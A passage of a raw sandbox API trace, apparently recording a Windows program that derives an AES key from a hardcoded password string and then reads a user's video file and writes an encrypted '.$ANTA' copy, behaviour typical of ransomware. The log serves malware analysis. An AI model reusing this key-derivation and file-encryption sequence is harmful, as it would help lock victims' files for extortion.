lpMultiByteStr=0x43ca508, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0097.571] CryptCreateHash (in: hProv=0x41a5360, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0097.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0097.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2ae8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0097.571] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0097.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0097.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0097.571] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0097.571] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0097.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0097.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca4a8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0097.572] CryptHashData (hHash=0x41ac500, pbData=0x17e27e8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0097.572] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0097.572] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0097.572] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0097.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0097.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca700, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0097.572] CryptDeriveKey (in: hProv=0x41a5360, Algid=0x6610, hBaseData=0x41ac500, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac540) returned 1 [0097.572] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0097.572] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0097.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0097.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0097.572] CryptDestroyHash (hHash=0x41ac500) returned 1 [0097.572] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\8PG6kQ2SW4h7w.flv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\8pg6kq2sw4h7w.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0097.573] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.573] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0097.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0097.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0097.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0097.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0097.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0097.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0097.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0097.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0097.573] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0097.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0097.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0097.573] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0097.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0097.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0097.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0097.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0097.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0097.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0097.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0097.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0097.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0097.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0097.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0097.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0097.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0097.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0097.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0097.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0097.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0097.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0097.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0097.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0097.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4150 [0097.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a298 [0097.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a0e0 [0097.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0097.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369dc8 [0097.575] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc")) returned 0x10 [0097.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0097.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0097.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0097.575] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0097.575] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\8PG6kQ2SW4h7w.flv.$ANTA" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\8pg6kq2sw4h7w.flv.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0097.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0097.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0097.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0097.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0097.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0097.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0097.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0097.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0097.576] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0097.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0097.576] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0097.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0097.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0097.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0097.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0097.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0097.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0097.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0097.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0097.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0097.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0097.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0097.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e02020 [0097.580] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0097.580] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x10000, lpOverlapped=0x0) returned 1 [0097.582] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x39d5, lpOverlapped=0x0) returned 1 [0097.582] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0097.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0097.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0097.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0097.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0097.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x139d5) returned 0x4516010 [0097.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e02020 | out: hHeap=0x1780000) returned 1 [0097.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0097.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0097.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0097.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0097.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0097.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x139d5) returned 0x45299f0 [0097.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0097.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0097.587] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0097.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0097.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0097.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0097.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0097.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0097.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x139d5) returned 0x4516010 [0097.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0097.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0097.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0097.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0097.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0097.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0097.588] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0097.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0097.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0097.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0097.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0097.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0097.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0097.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0097.588] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0097.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0097.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0097.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c78 [0097.588] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0097.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c78 | out: hHeap=0x1780000) returned 1 [0097.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0097.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0097.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2650 [0097.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0097.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0097.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0097.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0097.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x139d5) returned 0x4516010 [0097.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0097.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2590 [0097.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0097.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0097.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0097.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2660 [0097.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0097.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0097.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0097.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2630 [0097.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0097.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0097.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0097.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3a0 [0097.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0097.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0097.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0097.589] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0097.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0097.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x139d5) returned 0x499a008 [0097.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0097.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0097.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0097.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0097.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0097.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0097.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0097.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0097.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0097.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0097.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0097.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0097.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0097.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0097.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0097.590] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0097.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0097.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0097.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0097.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0097.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0097.591] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0097.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0097.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0097.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0097.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0097.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0097.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0097.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0097.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0097.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0097.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0097.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0097.591] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0097.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0097.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0097.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0097.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2690 [0097.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0097.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0097.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0097.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0097.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca460 [0097.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0097.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0097.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0097.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0097.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0097.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0097.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0097.592] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0097.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0097.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 